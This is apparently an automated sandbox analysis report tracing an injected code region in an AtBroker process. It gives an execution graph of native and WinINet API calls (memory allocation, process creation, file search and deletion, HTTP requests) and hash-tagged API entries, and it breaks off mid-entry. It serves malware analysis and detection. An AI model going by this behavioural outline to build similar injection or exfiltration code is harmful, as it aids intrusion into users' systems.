                                                                              Dynamic/Decrypted Code Coverage:3.9%
                                                                              Signature Coverage:1.4%
                                                                              Total number of Nodes:517
                                                                              Total number of Limit Nodes:79
                                                                              execution_graph 81952 4d02ad0 LdrInitializeThunk 81953 2ce454f 81954 2ce455f 81953->81954 81956 2ce4574 81954->81956 81957 2cf8c10 81954->81957 81958 2cf8c2d 81957->81958 81959 2cf8c3e NtClose 81958->81959 81959->81956 81960 2cdae40 81963 2cdb17d 81960->81963 81962 2cdb651 81963->81962 81964 2cfa740 81963->81964 81965 2cfa766 81964->81965 81970 2cd3dc0 81965->81970 81967 2cfa772 81968 2cfa7a0 81967->81968 81973 2cf59b0 81967->81973 81968->81962 81977 2ce4650 81970->81977 81972 2cd3dcd 81972->81967 81974 2cf5a0a 81973->81974 81976 2cf5a17 81974->81976 82001 2ce3580 81974->82001 81976->81968 81978 2ce4667 81977->81978 81980 2ce4680 81978->81980 81981 2cf9630 81978->81981 81980->81972 81983 2cf9648 81981->81983 81982 2cf966c 81982->81980 81983->81982 81988 2cf8340 81983->81988 81989 2cf835a 81988->81989 81995 4d02c0a 81989->81995 81990 2cf8386 81992 2cfaab0 81990->81992 81998 2cf8f30 81992->81998 81994 2cf96d7 81994->81980 81996 4d02c1f LdrInitializeThunk 81995->81996 81997 4d02c11 81995->81997 81996->81990 81997->81990 81999 2cf8f4d 81998->81999 82000 2cf8f5e RtlFreeHeap 81999->82000 82000->81994 82002 2ce35bb 82001->82002 82017 2ce8c10 82002->82017 82004 2ce35c3 82015 2ce388f 82004->82015 82026 2cfab90 82004->82026 82006 2ce35d9 82007 2cfab90 RtlAllocateHeap 82006->82007 82008 2ce35ea 82007->82008 82009 2cfab90 RtlAllocateHeap 82008->82009 82010 2ce35fb 82009->82010 82016 2ce368e 82010->82016 82029 2ce7a10 82010->82029 82013 2ce384f 82056 2ce3070 82013->82056 82015->81976 82052 2ce57a0 82016->82052 82018 2ce8c3c 82017->82018 82019 2ce8c81 82018->82019 82020 2ce8c69 82018->82020 82022 2ce8c9d 82019->82022 82024 2cf8c10 NtClose 82019->82024 82021 2ce8c74 82020->82021 82023 2cf8c10 NtClose 82020->82023 82021->82004 82022->82004 82023->82021 82025 2ce8c93 82024->82025 82025->82004 82072 2cf8ee0 82026->82072 82028 2cfabab 82028->82006 82030 2ce7a35 82029->82030 82033 2ce7a69 82030->82033 82090 2ce72b0 82030->82090 82032 2ce7b86 82032->82016 82033->82032 82075 2ce7540 82033->82075 82035 2ce7aff 82036 2ce7b0a 82035->82036 82097 2ce73c0 82035->82097 82036->82016 82039 2ce7c72 82041 2ce7540 3 API calls 82039->82041 82040 2cf8c10 NtClose 82046 2ce7bd2 82040->82046 82042 2ce7c88 82041->82042 82045 2ce7c8f 82042->82045 82101 2ce7710 82042->82101 82044 2ce7ccc 82044->82016 82045->82016 82047 2ce73c0 LdrInitializeThunk 82046->82047 82048 2ce7c1d 82047->82048 82049 2cf8c10 NtClose 82048->82049 82050 2ce7c27 82049->82050 82051 2ce73c0 LdrInitializeThunk 82050->82051 82051->82039 82053 2ce57c4 82052->82053 82054 2ce57cb 82053->82054 82055 2ce5800 LdrLoadDll 82053->82055 82054->82013 82055->82054 82059 2ce308a 82056->82059 82151 2ce8ee0 82056->82151 82058 2ce3568 82058->82015 82059->82058 82155 2cf1b40 82059->82155 82062 2ce328b 82163 2cfbcc0 82062->82163 82064 2ce30e8 82064->82058 82158 2cfbb90 82064->82158 82066 2ce32a0 82068 2ce32cb 82066->82068 82169 2ce1b00 82066->82169 82068->82058 82069 2ce1b00 LdrInitializeThunk 82068->82069 82172 2ce8e80 82068->82172 82069->82068 82070 2ce8e80 LdrInitializeThunk 82071 2ce33fa 82070->82071 82071->82068 82071->82070 82073 2cf8efd 82072->82073 82074 2cf8f0e RtlAllocateHeap 82073->82074 82074->82028 82076 2ce756c 82075->82076 82077 2ce73c0 LdrInitializeThunk 82076->82077 82078 2ce75b6 82077->82078 82079 2ce7658 82078->82079 82127 2cf8750 82078->82127 82079->82035 82081 2ce764f 82082 2cf8c10 NtClose 82081->82082 82082->82079 82083 2ce75dd 82083->82081 82084 2ce7664 82083->82084 82085 2cf8750 LdrInitializeThunk 82083->82085 82086 2cf8c10 NtClose 82084->82086 82085->82083 82087 2ce766d 82086->82087 82088 2ce73c0 LdrInitializeThunk 82087->82088 82089 2ce768a 82087->82089 82088->82089 82089->82035 82091 2ce72e3 82090->82091 82092 2ce7307 82091->82092 82132 2cf8800 82091->82132 82092->82033 82094 2ce732a 82094->82092 82095 2cf8c10 NtClose 82094->82095 82096 2ce73aa 82095->82096 82096->82033 82098 2ce73e5 82097->82098 82137 2cf85f0 82098->82137 82102 2ce7735 82101->82102 82103 2ce72b0 2 API calls 82102->82103 82105 2ce7765 82102->82105 82103->82105 82104 2ce7a01 82104->82044 82105->82104 82107 2ce73c0 LdrInitializeThunk 82105->82107 82114 2ce7968 82105->82114 82106 2ce73c0 LdrInitializeThunk 82108 2ce79b6 82106->82108 82109 2ce7891 82107->82109 82142 2ce7470 82108->82142 82111 2ce789c 82109->82111 82109->82114 82112 2cf8c10 NtClose 82111->82112 82116 2ce78a6 82112->82116 82113 2cf8c10 NtClose 82113->82104 82114->82106 82115 2ce79c6 82115->82113 82117 2ce73c0 LdrInitializeThunk 82116->82117 82118 2ce78f1 82117->82118 82119 2cf8c10 NtClose 82118->82119 82120 2ce78fb 82119->82120 82121 2ce73c0 LdrInitializeThunk 82120->82121 82122 2ce7946 82121->82122 82123 2ce7470 LdrInitializeThunk 82122->82123 82124 2ce7956 82123->82124 82125 2cf8c10 NtClose 82124->82125 82126 2ce7960 82125->82126 82126->82044 82128 2cf876d 82127->82128 82131 4d02ba0 LdrInitializeThunk 82128->82131 82129 2cf879d 82129->82083 82131->82129 82133 2cf881d 82132->82133 82136 4d02ca0 LdrInitializeThunk 82133->82136 82134 2cf8849 82134->82094 82136->82134 82138 2cf860a 82137->82138 82141 4d02c60 LdrInitializeThunk 82138->82141 82139 2ce7459 82139->82039 82139->82040 82141->82139 82144 2ce7496 82142->82144 82146 2cf8650 82144->82146 82147 2cf866a 82146->82147 82150 4d03090 LdrInitializeThunk 82147->82150 82148 2ce7524 82148->82115 82150->82148 82152 2ce8eed 82151->82152 82153 2ce8f0e SetErrorMode 82152->82153 82154 2ce8f15 82152->82154 82153->82154 82154->82059 82176 2cfaa20 82155->82176 82157 2cf1b61 82157->82064 82159 2cfbba6 82158->82159 82160 2cfbba0 82158->82160 82161 2cfab90 RtlAllocateHeap 82159->82161 82160->82062 82162 2cfbbcc 82161->82162 82162->82062 82165 2cfbc30 82163->82165 82164 2cfbc8d 82164->82066 82165->82164 82166 2cfab90 RtlAllocateHeap 82165->82166 82167 2cfbc6a 82166->82167 82168 2cfaab0 RtlFreeHeap 82167->82168 82168->82164 82183 2cf8e50 82169->82183 82173 2ce8e93 82172->82173 82188 2cf8260 82173->82188 82175 2ce8ebe 82175->82068 82179 2cf8d50 82176->82179 82178 2cfaa51 82178->82157 82180 2cf8db9 82179->82180 82182 2cf8d74 82179->82182 82181 2cf8dcf NtAllocateVirtualMemory 82180->82181 82181->82178 82182->82178 82184 2cf8e6d 82183->82184 82187 4d02c70 LdrInitializeThunk 82184->82187 82185 2ce1b22 82185->82071 82187->82185 82189 2cf82b9 82188->82189 82191 2cf8284 82188->82191 82193 4d02dd0 LdrInitializeThunk 82189->82193 82190 2cf82de 82190->82175 82191->82175 82193->82190 82194 2ce6a40 82195 2ce8e80 LdrInitializeThunk 82194->82195 82196 2ce6a70 82195->82196 82198 2ce6a9c 82196->82198 82199 2ce8e00 82196->82199 82200 2ce8e44 82199->82200 82201 2ce8e65 82200->82201 82206 2cf80b0 82200->82206 82201->82196 82203 2ce8e55 82204 2ce8e71 82203->82204 82205 2cf8c10 NtClose 82203->82205 82204->82196 82205->82201 82207 2cf8106 82206->82207 82208 2cf80d1 82206->82208 82211 4d04650 LdrInitializeThunk 82207->82211 82208->82203 82209 2cf812b 82209->82203 82211->82209 82212 2ced1c0 82213 2ced1e9 82212->82213 82214 2ced2ed 82213->82214 82215 2ced293 FindFirstFileW 82213->82215 82215->82214 82217 2ced2ae 82215->82217 82216 2ced2d4 FindNextFileW 82216->82217 82218 2ced2e6 FindClose 82216->82218 82217->82216 82218->82214 82319 2ce8300 82320 2ce8372 82319->82320 82321 2ce8318 82319->82321 82321->82320 82323 2cebf20 82321->82323 82324 2cebf46 82323->82324 82328 2cec15f 82324->82328 82350 2cf8fc0 82324->82350 82326 2cebfbc 82327 2cfbcc0 2 API calls 82326->82327 82326->82328 82329 2cebfd2 82327->82329 82328->82320 82329->82328 82330 2cec0a3 82329->82330 82331 2cf8340 LdrInitializeThunk 82329->82331 82333 2ce69c0 LdrInitializeThunk 82330->82333 82334 2cec0c2 82330->82334 82332 2cec02e 82331->82332 82332->82330 82339 2cec037 82332->82339 82333->82334 82336 2cec147 82334->82336 82357 2cf7fb0 82334->82357 82335 2cec08b 82337 2ce8e80 LdrInitializeThunk 82335->82337 82344 2ce8e80 LdrInitializeThunk 82336->82344 82343 2cec099 82337->82343 82338 2cec069 82372 2cf4bb0 LdrInitializeThunk 82338->82372 82339->82328 82339->82335 82339->82338 82353 2ce69c0 82339->82353 82343->82320 82346 2cec155 82344->82346 82345 2cec11e 82362 2cf8030 82345->82362 82346->82320 82348 2cec138 82367 2cf8130 82348->82367 82351 2cf8fdd 82350->82351 82352 2cf8fee CreateProcessInternalW 82351->82352 82352->82326 82354 2ce69d3 82353->82354 82355 2cf84e0 LdrInitializeThunk 82354->82355 82356 2ce69fe 82355->82356 82356->82338 82358 2cf8006 82357->82358 82359 2cf7fd1 82357->82359 82373 4d039b0 LdrInitializeThunk 82358->82373 82359->82345 82360 2cf802b 82360->82345 82363 2cf8086 82362->82363 82365 2cf8051 82362->82365 82374 4d04340 LdrInitializeThunk 82363->82374 82364 2cf80ab 82364->82348 82365->82348 82368 2cf8189 82367->82368 82369 2cf8154 82367->82369 82375 4d02fb0 LdrInitializeThunk 82368->82375 82369->82336 82370 2cf81ae 82370->82336 82372->82335 82373->82360 82374->82364 82375->82370 82376 2cf1d01 82388 2cf8ad0 82376->82388 82378 2cf1d22 82379 2cf1d55 82378->82379 82380 2cf1d40 82378->82380 82381 2cf8c10 NtClose 82379->82381 82382 2cf8c10 NtClose 82380->82382 82385 2cf1d5e 82381->82385 82383 2cf1d49 82382->82383 82384 2cf1d8a 82385->82384 82386 2cfaab0 RtlFreeHeap 82385->82386 82387 2cf1d7e 82386->82387 82389 2cf8b42 82388->82389 82391 2cf8af1 82388->82391 82390 2cf8b58 NtReadFile 82389->82390 82390->82378 82391->82378 82219 2cf94c0 82220 2cf94f2 82219->82220 82221 2cf9516 HttpSendRequestA 82220->82221 82222 2cf9531 82220->82222 82223 2cf81c0 82224 2cf8222 82223->82224 82226 2cf81e1 82223->82226 82228 4d02ee0 LdrInitializeThunk 82224->82228 82225 2cf8253 82228->82225 82392 2cf0b80 82393 2cf0b9d 82392->82393 82394 2ce57a0 LdrLoadDll 82393->82394 82395 2cf0bbb 82394->82395 82396 2cf2500 82401 2cf250f 82396->82401 82397 2cf2599 82398 2cf2556 82399 2cfaab0 RtlFreeHeap 82398->82399 82400 2cf2566 82399->82400 82401->82397 82401->82398 82402 2cf2594 82401->82402 82403 2cfaab0 RtlFreeHeap 82402->82403 82403->82397 82229 2ce955e 82230 2ce9563 82229->82230 82231 2ce9522 82230->82231 82233 2ce7f80 LdrInitializeThunk LdrInitializeThunk 82230->82233 82233->82231 82404 2cea995 82405 2cea95a 82404->82405 82408 2cea99e 82404->82408 82406 2cfaab0 RtlFreeHeap 82405->82406 82407 2cea988 82405->82407 82406->82407 82234 2cdc950 82235 2cfaa20 NtAllocateVirtualMemory 82234->82235 82236 2cddfc1 82234->82236 82235->82236 82237 2ce6ad0 82238 2ce6ae6 82237->82238 82239 2cf8340 LdrInitializeThunk 82238->82239 82240 2ce6b06 82239->82240 82243 2cf8cb0 82240->82243 82242 2ce6b1b 82244 2cf8cd1 82243->82244 82245 2cf8d12 82243->82245 82244->82242 82248 4d02e80 LdrInitializeThunk 82245->82248 82246 2cf8d43 82246->82242 82248->82246 82409 2cf8b90 82410 2cf8be2 82409->82410 82412 2cf8bb1 82409->82412 82411 2cf8bf8 NtDeleteFile 82410->82411 82250 2ce1feb PostThreadMessageW 82251 2ce1ffd 82250->82251 82413 2ce8ba4 82414 2ce8bb6 82413->82414 82419 2cf83e0 82414->82419 82417 2cf8c10 NtClose 82418 2ce8bf6 82417->82418 82420 2cf83fa 82419->82420 82423 4d035c0 LdrInitializeThunk 82420->82423 82421 2ce8bea 82421->82417 82423->82421 82252 2cdade0 82253 2cdadef 82252->82253 82254 2cdae30 82253->82254 82255 2cdae1d CreateThread 82253->82255 82256 2ce7d60 82257 2ce7d8a 82256->82257 82260 2ce8cb0 82257->82260 82259 2ce7db4 82261 2ce8ccd 82260->82261 82267 2cf8430 82261->82267 82263 2ce8d1d 82264 2ce8d24 82263->82264 82272 2cf84e0 82263->82272 82264->82259 82266 2ce8d4d 82266->82259 82268 2cf849d 82267->82268 82269 2cf8454 82267->82269 82277 4d02f30 LdrInitializeThunk 82268->82277 82269->82263 82270 2cf84d6 82270->82263 82273 2cf8556 82272->82273 82275 2cf8501 82272->82275 82278 4d02d10 LdrInitializeThunk 82273->82278 82274 2cf859b 82274->82266 82275->82266 82277->82270 82278->82274 82424 2ceba20 82429 2ceb750 82424->82429 82426 2ceba2d 82443 2ceb3f0 82426->82443 82428 2ceba49 82430 2ceb775 82429->82430 82431 2ceb8b2 82430->82431 82454 2cf37d0 82430->82454 82431->82426 82433 2ceb8c9 82433->82426 82435 2ceb8c0 82435->82433 82438 2ceb9b1 82435->82438 82465 2cf5270 82435->82465 82470 2ceae50 82435->82470 82437 2cf5270 GetFileAttributesW 82437->82438 82438->82437 82439 2ceba09 82438->82439 82479 2ceb1b0 82438->82479 82441 2cfaab0 RtlFreeHeap 82439->82441 82442 2ceba10 82441->82442 82442->82426 82444 2ceb406 82443->82444 82447 2ceb411 82443->82447 82445 2cfab90 RtlAllocateHeap 82444->82445 82445->82447 82446 2ceb427 82446->82428 82447->82446 82448 2ceb71e 82447->82448 82451 2cf5270 GetFileAttributesW 82447->82451 82452 2ceae50 RtlFreeHeap 82447->82452 82453 2ceb1b0 RtlFreeHeap 82447->82453 82449 2ceb737 82448->82449 82450 2cfaab0 RtlFreeHeap 82448->82450 82449->82428 82450->82449 82451->82447 82452->82447 82453->82447 82455 2cf37de 82454->82455 82456 2cf37e5 82454->82456 82455->82435 82457 2ce57a0 LdrLoadDll 82456->82457 82458 2cf381a 82457->82458 82459 2cf3829 82458->82459 82483 2cf32a0 LdrLoadDll 82458->82483 82460 2cfab90 RtlAllocateHeap 82459->82460 82464 2cf39c4 82459->82464 82463 2cf3842 82460->82463 82462 2cfaab0 RtlFreeHeap 82462->82464 82463->82462 82463->82464 82464->82435 82466 2cf52cd 82465->82466 82467 2cf5304 82466->82467 82484 2ce9120 82466->82484 82467->82435 82469 2cf52e6 82469->82435 82471 2ceae76 82470->82471 82488 2cee690 82471->82488 82473 2ceaedd 82475 2ceb060 82473->82475 82477 2ceaefb 82473->82477 82474 2ceb045 82474->82435 82475->82474 82476 2cead10 RtlFreeHeap 82475->82476 82476->82475 82477->82474 82493 2cead10 82477->82493 82480 2ceb1d6 82479->82480 82481 2cee690 RtlFreeHeap 82480->82481 82482 2ceb252 82481->82482 82482->82438 82483->82459 82486 2ce90ee 82484->82486 82485 2ce9103 82485->82469 82486->82484 82486->82485 82487 2ce90f8 GetFileAttributesW 82486->82487 82487->82485 82490 2cee6a6 82488->82490 82489 2cee6b0 82489->82473 82490->82489 82491 2cfaab0 RtlFreeHeap 82490->82491 82492 2cee6e9 82491->82492 82492->82473 82494 2cead26 82493->82494 82497 2cee700 82494->82497 82496 2ceae2c 82496->82477 82498 2cee724 82497->82498 82499 2cee7bc 82498->82499 82500 2cfaab0 RtlFreeHeap 82498->82500 82499->82496 82500->82499 82506 2cf02a0 82507 2cf0304 82506->82507 82508 2ce72b0 2 API calls 82507->82508 82510 2cf042d 82508->82510 82509 2cf0434 82510->82509 82511 2ce73c0 LdrInitializeThunk 82510->82511 82512 2cf04b0 82511->82512 82513 2cf05e2 82512->82513 82532 2cf05d3 82512->82532 82535 2cf0080 82512->82535 82514 2cf8c10 NtClose 82513->82514 82516 2cf05ec 82514->82516 82517 2cf04e5 82517->82513 82518 2cf04f0 82517->82518 82519 2cfab90 RtlAllocateHeap 82518->82519 82520 2cf0519 82519->82520 82521 2cf0538 82520->82521 82522 2cf0522 82520->82522 82544 2ceff70 CoInitialize 82521->82544 82523 2cf8c10 NtClose 82522->82523 82525 2cf052c 82523->82525 82526 2cf0546 82527 2cf8750 LdrInitializeThunk 82526->82527 82534 2cf0564 82527->82534 82528 2cf05c2 82529 2cf8c10 NtClose 82528->82529 82530 2cf05cc 82529->82530 82531 2cfaab0 RtlFreeHeap 82530->82531 82531->82532 82533 2cf8750 LdrInitializeThunk 82533->82534 82534->82528 82534->82533 82536 2cf009c 82535->82536 82537 2ce57a0 LdrLoadDll 82536->82537 82539 2cf00ba 82537->82539 82538 2cf00c3 82538->82517 82539->82538 82540 2ce57a0 LdrLoadDll 82539->82540 82541 2cf018e 82540->82541 82542 2ce57a0 LdrLoadDll 82541->82542 82543 2cf01eb 82541->82543 82542->82543 82543->82517 82545 2ceffd5 82544->82545 82545->82526 82546 2cf89a0 82547 2cf8a1a 82546->82547 82548 2cf89c1 82546->82548 82549 2cf8a30 NtCreateFile 82547->82549 82550 2cf93a0 82551 2cf93d2 82550->82551 82552 2cf941d 82551->82552 82553 2cf93f6 InternetConnectA 82551->82553 82559 2cf9320 82560 2cf9352 82559->82560 82561 2cf9376 InternetOpenA 82560->82561 82562 2cf9391 82560->82562 82281 2ce3bf3 82282 2ce72b0 2 API calls 82281->82282 82283 2ce3c13 82282->82283 82563 2ce8130 82564 2ce8141 82563->82564 82566 2cf8c10 NtClose 82564->82566 82572 2ce819f 82564->82572 82565 2ce82c8 82567 2ce8167 82566->82567 82570 2ce7540 3 API calls 82567->82570 82568 2ce7540 3 API calls 82569 2ce82a2 82568->82569 82569->82565 82571 2ce7710 4 API calls 82569->82571 82570->82572 82571->82565 82572->82565 82572->82568 82289 2cf82f0 82290 2cf830a 82289->82290 82293 4d02df0 LdrInitializeThunk 82290->82293 82291 2cf8332 82293->82291 82294 2cfbbf0 82295 2cfaab0 RtlFreeHeap 82294->82295 82296 2cfbc05 82295->82296 82297 2cf6370 82298 2cf63ca 82297->82298 82300 2cf63d7 82298->82300 82301 2cf3f00 82298->82301 82302 2cfaa20 NtAllocateVirtualMemory 82301->82302 82304 2cf3f41 82301->82304 82302->82304 82303 2cf4046 82303->82300 82304->82303 82305 2ce57a0 LdrLoadDll 82304->82305 82306 2cf3f87 82305->82306 82306->82303 82307 2cf3fc0 Sleep 82306->82307 82307->82306 82308 2cf2170 82309 2cf218c 82308->82309 82310 2cf21c8 82309->82310 82311 2cf21b4 82309->82311 82312 2cf8c10 NtClose 82310->82312 82313 2cf8c10 NtClose 82311->82313 82314 2cf21d1 82312->82314 82315 2cf21bd 82313->82315 82318 2cfabd0 RtlAllocateHeap 82314->82318 82317 2cf21dc 82318->82317 82573 2cf9430 82574 2cf9462 82573->82574 82575 2cf94ad 82574->82575 82576 2cf9486 HttpOpenRequestA 82574->82576
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,00000000), ref: 02CED2A4
                                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 02CED2DF
                                                                              • FindClose.KERNEL32(?), ref: 02CED2EA
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_2cd0000_AtBroker.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Find$File$CloseFirstNext
                                                                              • String ID:
                                                                              • API String ID: 3541575487-0
                                                                              • Opcode ID: 43aa0383ec3200e12579adb78577bfc42a337f4ce00c9519131ef013542de78f
                                                                              • Instruction ID: 3adab39e1d9f14b9ea9e29cc9bcf3778b85f2b326756ed6480e27bf777df88c0
                                                                              • Opcode Fuzzy Hash: 43aa0383ec3200e12579adb78577bfc42a337f4ce00c9519131ef013542de78f
                                                                              • Instruction Fuzzy Hash: 67315071900209ABDB61DFA0CC85FFB777DAF84745F144558BA0AA6180DB70AA859BA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02CF8A61
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_2cd0000_AtBroker.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: cb7fa5642adef2e60d2b04cf313a2cdc583469e5c42a9b56a82cbefba5456746
                                                                              • Instruction ID: eb546f6ff536dc859b6f6b476441acbd87de6b1cc13d6eb662e5a8bac446aa7f
                                                                              • Opcode Fuzzy Hash: cb7fa5642adef2e60d2b04cf313a2cdc583469e5c42a9b56a82cbefba5456746
                                                                              • Instruction Fuzzy Hash: 7721ACB2201648BBDB54DF98DC80EEB77EEAB8C714F158208FA1D93240D630E9518BA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02CF8B81
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_2cd0000_AtBroker.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: 6c2950231a5173a1373c7449ca6bba4f1f5f517c15ada156b9eb2e86a673e209
                                                                              • Instruction ID: 36bce2482698444495fc0efdadc2a5e1cfda1b8a3b79bf3e492d7b35756a2bc4
                                                                              • Opcode Fuzzy Hash: 6c2950231a5173a1373c7449ca6bba4f1f5f517c15ada156b9eb2e86a673e209
                                                                              • Instruction Fuzzy Hash: 4221C2B2200609AFDB54DF98DC80EEB77EEEF8C714F158608FA5D97240D630A911CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • NtAllocateVirtualMemory.NTDLL(02CE30E8,?,?,00000000,00000004,00003000,00000004,00000000,?,?,02CE30E8,?,?), ref: 02CF8DEC
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_2cd0000_AtBroker.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateMemoryVirtual
                                                                              • String ID:
                                                                              • API String ID: 2167126740-0
                                                                              • Opcode ID: 1f16826501cdef62a32a87dcd2d00b6008b56a0ff25c08a792a10c21c0c4454f
                                                                              • Instruction ID: 562a23f3dce86f227c1b4eb5293fb5c782705de879e43e319438ab8486dd5970
                                                                              • Opcode Fuzzy Hash: 1f16826501cdef62a32a87dcd2d00b6008b56a0ff25c08a792a10c21c0c4454f
                                                                              • Instruction Fuzzy Hash: 6B11D2B6200649BFDB50DF98DC80EAB77ADEFC8714F008609FA5997240DB74B911CBA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_2cd0000_AtBroker.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DeleteFile
                                                                              • String ID:
                                                                              • API String ID: 4033686569-0
                                                                              • Opcode ID: 308279b301a110b5b29dad7a973b68a99b80501d37a1822c39e1763389cc6a7d
                                                                              • Instruction ID: 929dbddee24aeb9322b33421f3acf2ee0bbaf5ec4275fe767df573836b26e066
                                                                              • Opcode Fuzzy Hash: 308279b301a110b5b29dad7a973b68a99b80501d37a1822c39e1763389cc6a7d
                                                                              • Instruction Fuzzy Hash: ED01A975600600BBE660EBA8DC40FAB77ADEFC4714F108909FA0C97240DB717A00CBB5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • NtClose.NTDLL(02CF21D1,?,00000000,02CE46BC,?,02CF21D1,02CE46BC,0000C994,?,?,?,?,?,?,?,02CF58D6), ref: 02CF8C47
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3309595807.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_2cd0000_AtBroker.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              • Opcode ID: 373865c143e049b55edfb69dcf5614b252f6e231a12f9e1cbf7606109e253f42
                                                                              • Instruction ID: 7d614934a809c3f2f7601122117a3e8d6422b043e252152e275a4271fa594d67
                                                                              • Opcode Fuzzy Hash: 373865c143e049b55edfb69dcf5614b252f6e231a12f9e1cbf7606109e253f42
                                                                              • Instruction Fuzzy Hash: 77E046762006147BD620EA6ACC00FABBBADDBC5710F018419FA0CAB242C6B1B9118BA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: e6f976171994977a6fa4105d17b5589e067f83520551818fbfddc2cc72beea2f
                                                                              • Instruction ID: 074bb2d129b02714acd68e046e9245560f692d1258239dbd08782dbc2bd4e7c0
                                                                              • Opcode Fuzzy Hash: e6f976171994977a6fa4105d17b5589e067f83520551818fbfddc2cc72beea2f
                                                                              • Instruction Fuzzy Hash: C990023164550413F200B158651470620158BD1205F65C412B4425679D8795DA5175A2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 08699b0e31e1b09df8fccf96f72ab6b967370e4b8ce244f558af75a26c385865
                                                                              • Instruction ID: 7d9ba2e5f2782ae8e3a65d62c2539e9c053cd214e3912506da66951080f2a927
                                                                              • Opcode Fuzzy Hash: 08699b0e31e1b09df8fccf96f72ab6b967370e4b8ce244f558af75a26c385865
                                                                              • Instruction Fuzzy Hash: C2900261641500536240B158680440670159BE2305395C116B4555671C8718D955A269
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 9e5441d716ac2859a94f32c0b9331ec4cea67f9ef69ec8a90621562a52cc0b37
